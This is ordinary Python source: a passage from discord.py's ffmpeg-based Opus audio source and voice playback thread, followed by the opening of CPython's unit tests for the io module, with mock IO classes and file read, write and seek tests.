You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, f"_probe_codec_{method}", None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = "ffmpeg") -> Tuple[Optional[str], Optional[int]]:
exe = f"{executable[:2]}probe" if executable in {"ffmpeg", "avconv"} else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = "ffmpeg") -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args,
creationflags=CREATE_NO_WINDOW,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; it takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
